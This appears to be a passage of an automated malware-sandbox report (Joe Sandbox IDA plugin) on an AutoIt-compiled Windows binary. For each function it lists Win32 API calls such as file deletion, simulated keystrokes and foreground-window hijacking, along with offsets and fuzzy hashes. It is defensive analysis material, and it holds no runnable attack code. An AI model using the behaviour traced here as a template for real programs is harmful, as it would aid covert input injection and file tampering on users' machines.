Instruction ID: fa724ccc5e4b8f88125a67bd34b864bfb579d22c171c3aa7cdc38bbb8a331b24
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: C6012672214705ABE3218E699881ADAFBE9FBDD370F25055DE18483280EA70A855CAB4

Function 0020E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4860cf511ebaca92fc42fdb963b24a02761f1dd9096020d144c68d3ad4ca46
Instruction ID: 7a7b1527afb5efbbcfee44ebbfb21cdace5d477a578e4a6988d1242fe2620448
Opcode Fuzzy Hash: bc4860cf511ebaca92fc42fdb963b24a02761f1dd9096020d144c68d3ad4ca46
Instruction Fuzzy Hash: 2CF04432531B149ADB313E69AC05B9A33CC8F62330F120B15F820931C3CB7198B68EA6

Function 0025EEED Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0025EF2A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: a0c5fb451ef133b59c5d8245fe037be7953125fb07bdc936fc797d163e350ec4
Instruction ID: 5fed60a64355b00e2c22e8639e4022e9af0fbba314b5227f1b58a62881a50ff7
Opcode Fuzzy Hash: a0c5fb451ef133b59c5d8245fe037be7953125fb07bdc936fc797d163e350ec4
Instruction Fuzzy Hash: B2F08175600205AFCB10EBA5DC4AD9F77A8EF55720F000059F6099B261EB70EE45CBA0

Function 00214C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00212E29,00000001,00000364,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00214CBE

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 182990196b4c2d6d852982945e0e524eee5e47388295f2bee5818f26fb606af4
Instruction ID: 599765d3c7f1718d13e830a3bc095fd7649008a7a51174ed988b1ede2a3eddc8
Opcode Fuzzy Hash: 182990196b4c2d6d852982945e0e524eee5e47388295f2bee5818f26fb606af4
Instruction Fuzzy Hash: A5F0E93163222667DB317F769C09BDA37C8BF717A0B148127BC1DA65D1CA70D8B086E0

Function 00213820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 889ee6886653d9c37ef4b78ad675d525a765b90ddfe9e8a8a12b6ab2730b30fd
Instruction ID: 187ad6d4e72d4637e31371f99f346673e6462fa74027ef61d5e65e6feef51f88
Opcode Fuzzy Hash: 889ee6886653d9c37ef4b78ad675d525a765b90ddfe9e8a8a12b6ab2730b30fd
Instruction Fuzzy Hash: E7E0E53213022696D7316F769C08BDB37CBAB627B0F174131BD08928D1DB50DDB185E0

Function 001E4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4F6D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: caf5993e39ece7a8b162aae8d8a7259ffc784550e6b29b51182d9c0f07a0ef45
Instruction ID: ecac5d86b255d77338c6cca42dd6086d692b787229b18550e4a4ec178ec8213d
Opcode Fuzzy Hash: caf5993e39ece7a8b162aae8d8a7259ffc784550e6b29b51182d9c0f07a0ef45
Instruction Fuzzy Hash: 92F03071105B91CFDB389F6AE49481AB7E4AF14719321897EE1DA83511C7359C84DF50

Function 001E30F2 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 001E314E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: d86401384a0c023c74a19a723a9219cc73109d49bc163836a3fd49ac331a6212
Instruction ID: 773180115c6534686b4923d22e68369612a6d4445ffaec8374fd25f00c63d217
Opcode Fuzzy Hash: d86401384a0c023c74a19a723a9219cc73109d49bc163836a3fd49ac331a6212
Instruction Fuzzy Hash: EBF0A0709143089FEB529B24EC4E7DA7BFCAB01708F1401E9A28897282EB705B98CF41

Function 001E2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001E2DC4

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: edf899a85a0cd19f2220261b7297a1c758a55247069c5af6b9be5afe125ac0fd
Instruction ID: 10f23f7bdfaddaccde788d412aeee71039f319c1f3f60e1d13ebd5e8552b9231
Opcode Fuzzy Hash: edf899a85a0cd19f2220261b7297a1c758a55247069c5af6b9be5afe125ac0fd
Instruction Fuzzy Hash: 93E0CD726002246BC72092989C05FDA77DDDFC87D0F040075FD09D7258DA60ADC08550

Function 001E2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3908

Part of subcall function 001ED730: GetInputState.USER32 ref: 001ED807

SetCurrentDirectoryW.KERNEL32(?), ref: 001E2B6B

Part of subcall function 001E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001E314E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 914ca313710895bcdc38ba0ec738c5d090129054e9a13469e1742794a86455e2
Instruction ID: e4e8c04d9c18bf8c541aac8a533636372778ad3d8d69c5baa1deb78054cfc6a0
Opcode Fuzzy Hash: 914ca313710895bcdc38ba0ec738c5d090129054e9a13469e1742794a86455e2
Instruction Fuzzy Hash: 8FE026213006C403C604BB72B82A8ADB3599BF1351F80053EF06243162CF2049954311

Function 00250944 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_0007092A,00000000,00000000,?), ref: 0025095F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4a419ccad9ad200cf9730f73615f8aab2bb3dde0df7f88f24acd8684fc0b82ba
Instruction ID: 53e5d9805bd372a2ae7afb35cd4f3de55492cf07680b9eacff202bb64173fa99
Opcode Fuzzy Hash: 4a419ccad9ad200cf9730f73615f8aab2bb3dde0df7f88f24acd8684fc0b82ba
Instruction Fuzzy Hash: 2ED05EB2422315BFAB2C9B60DD4ACA7769CEA05B12340162EB806A1501F5B0FD00CAA4

Function 0024DF27 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0024DF40

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: 0ffb122c4b6169ff0fc75fb2e79f3f20493cff1611d7774a81d67821f6162ab8
Instruction ID: 54ef76b0d13e25a534301bd9be493e5540e3e939f0119317b4f9b40538601f2f
Opcode Fuzzy Hash: 0ffb122c4b6169ff0fc75fb2e79f3f20493cff1611d7774a81d67821f6162ab8
Instruction Fuzzy Hash: 62D05EA2A002282BDF60A6759C0DDFB3AADD740250F0006A0786DD3152EA20DD8486B0

Function 0022039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00220704,?,?,00000000,?,00220704,00000000,0000000C), ref: 002203B7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1682e831a282ca9d385bb55ee2cab652053cc5903f1c05024e05b0bb9f08e138
Instruction ID: a783dccc88c8aa8170f7a87de7df11d7f1582616b502fa831e3b04a5b01bd33b
Opcode Fuzzy Hash: 1682e831a282ca9d385bb55ee2cab652053cc5903f1c05024e05b0bb9f08e138
Instruction Fuzzy Hash: 8FD06C3204010DBBDF028F85ED06EDA3BAAFB48714F114050BE1C56020C732E861AB90

Function 0024E199 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d15cd9abe8dd9e4fe432f84b91feffe7e70168eb7d54abb1f715660ebb99e72b
Instruction ID: 005604473e79d9b2d84f131e90ecd85e49643d247b08052e634d1159c0f46a80
Opcode Fuzzy Hash: d15cd9abe8dd9e4fe432f84b91feffe7e70168eb7d54abb1f715660ebb99e72b
Instruction Fuzzy Hash: 71B0923406064105BD2C0E38290C1A9330079C33B57E91BC4E87D850E683398CABA520

Function 001E1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001E1CBC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 3b98544524a6c12c318c1be86d53a37f5db569dd1fb9dc44581f6d7525607894
Instruction ID: c9d7b2e16a8fe44b8e77dd067b13e07ed6fd2e08d316d7ef7f706b52fe55455e
Opcode Fuzzy Hash: 3b98544524a6c12c318c1be86d53a37f5db569dd1fb9dc44581f6d7525607894
Instruction Fuzzy Hash: E6C09236280304EFF2288B90BC5EF1077A4E348B00F988101F70DB95E3D3A22860EB50

Function 00255C07 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0024D3A9: FindFirstFileW.KERNELBASE(?,?), ref: 0024D420
Part of subcall function 0024D3A9: DeleteFileW.KERNELBASE(?,?,?,?), ref: 0024D470
Part of subcall function 0024D3A9: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0024D481
Part of subcall function 0024D3A9: FindClose.KERNEL32(00000000), ref: 0024D498

GetLastError.KERNEL32 ref: 00255C29

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: d4313bc6bd0ecc9653e00af62feb260277f95592e32420bd167be6542022f288
Instruction ID: d6ae58553b3c6789e817632eb16c7730bb98d1c2872c49a5e77ee69b79655f01
Opcode Fuzzy Hash: d4313bc6bd0ecc9653e00af62feb260277f95592e32420bd167be6542022f288
Instruction Fuzzy Hash: 73F0A032300A108FDB14EF99E854B6EB7E9AF98361F04845DF90A9B352CB70FC018B94

Non-executed Functions

Function 00279576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0027961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0027965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0027969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002796C9
SendMessageW.USER32 ref: 002796F2
GetKeyState.USER32(00000011), ref: 0027978B
GetKeyState.USER32(00000009), ref: 00279798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002797AE
GetKeyState.USER32(00000010), ref: 002797B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002797E9
SendMessageW.USER32 ref: 00279810
SendMessageW.USER32(?,00001030,?,00277E95), ref: 00279918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0027992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00279941
SetCapture.USER32(?), ref: 0027994A
ClientToScreen.USER32(?,?), ref: 002799AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002799BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002799D6
ReleaseCapture.USER32 ref: 002799E1
GetCursorPos.USER32(?), ref: 00279A19
ScreenToClient.USER32(?,?), ref: 00279A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00279A80
SendMessageW.USER32 ref: 00279AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00279AEB
SendMessageW.USER32 ref: 00279B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00279B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00279B4A
GetCursorPos.USER32(?), ref: 00279B68
ScreenToClient.USER32(?,?), ref: 00279B75
GetParent.USER32(?), ref: 00279B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00279BFA
SendMessageW.USER32 ref: 00279C2B
ClientToScreen.USER32(?,?), ref: 00279C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00279CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00279CDE
SendMessageW.USER32 ref: 00279D01
ClientToScreen.USER32(?,?), ref: 00279D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00279D82

Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952

GetWindowLongW.USER32(?,000000F0), ref: 00279E05

Strings

@GUI_DRAGID, xrefs: 0027997D
F, xrefs: 00279D07
p#+, xrefs: 00279990

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#+
API String ID: 3429851547-1203076301
Opcode ID: 1fa491c257f574a8e2086b0360af16acc68695adf2927c3500ac27c2ae0a6132
Instruction ID: d9b4023cba9d6498b5adf8c072b130fd08e52ae7728877c83609c7873fd001b4
Opcode Fuzzy Hash: 1fa491c257f574a8e2086b0360af16acc68695adf2927c3500ac27c2ae0a6132
Instruction Fuzzy Hash: 44428F70614342AFD724CF24DC88AAABBE9FF49310F10861DF699872A1D771E8A0CF51

Function 00274873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002748F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00274908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00274927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0027494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0027495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0027497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002749AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002749D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00274A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00274A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00274A7E
IsMenu.USER32(?), ref: 00274A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00274AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00274B20
GetWindowLongW.USER32(?,000000F0), ref: 00274B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00274BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00274C82
wsprintfW.USER32 ref: 00274CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00274CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00274CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00274D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00274D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00274D5A

Strings

%d/%02d/%02d, xrefs: 00274CA8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: cf4a8fc86e8fe6349e697a6d73cdd4e09d57cf691813a8eda5bad3e3642f2e71
Instruction ID: 3a96a6cbb7804226148354b7979628792869e6ec387cc08338912ccbc90f5137
Opcode Fuzzy Hash: cf4a8fc86e8fe6349e697a6d73cdd4e09d57cf691813a8eda5bad3e3642f2e71
Instruction Fuzzy Hash: CF120171510209ABEB25AF34DC49FAE7BF8EF85310F10812DF51AEA2E1D7B49951CB50

Function 001FF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001FF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0023F474
IsIconic.USER32(00000000), ref: 0023F47D
ShowWindow.USER32(00000000,00000009), ref: 0023F48A
SetForegroundWindow.USER32(00000000), ref: 0023F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0023F4AA
GetCurrentThreadId.KERNEL32 ref: 0023F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0023F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0023F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0023F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0023F4DE
SetForegroundWindow.USER32(00000000), ref: 0023F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F4F6
keybd_event.USER32(00000012,00000000), ref: 0023F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F50B
keybd_event.USER32(00000012,00000000), ref: 0023F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F519
keybd_event.USER32(00000012,00000000), ref: 0023F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F528
keybd_event.USER32(00000012,00000000), ref: 0023F52D
SetForegroundWindow.USER32(00000000), ref: 0023F530
